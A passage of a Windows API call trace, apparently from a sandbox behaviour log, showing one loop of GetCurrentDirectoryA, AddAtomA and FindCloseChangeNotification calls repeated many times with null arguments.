lpBuffer="Module32FirstW") returned 0x26 [0129.284] AddAtomA (lpString=0x0) returned 0x0 [0129.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.285] AddAtomA (lpString=0x0) returned 0x0 [0129.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.286] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.287] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.288] AddAtomA (lpString=0x0) returned 0x0 [0129.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.289] AddAtomA (lpString=0x0) returned 0x0 [0129.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.290] AddAtomA (lpString=0x0) returned 0x0 [0129.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.291] AddAtomA (lpString=0x0) returned 0x0 [0129.291] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.291] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.292] AddAtomA (lpString=0x0) returned 0x0 [0129.292] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.292] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.293] AddAtomA (lpString=0x0) returned 0x0 [0129.293] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.293] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.294] AddAtomA (lpString=0x0) returned 0x0 [0129.294] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.294] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.295] AddAtomA (lpString=0x0) returned 0x0 [0129.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.296] AddAtomA (lpString=0x0) returned 0x0 [0129.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.297] AddAtomA (lpString=0x0) returned 0x0 [0129.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.297] AddAtomA (lpString=0x0) returned 0x0 [0129.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.297] AddAtomA (lpString=0x0) returned 0x0 [0129.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, 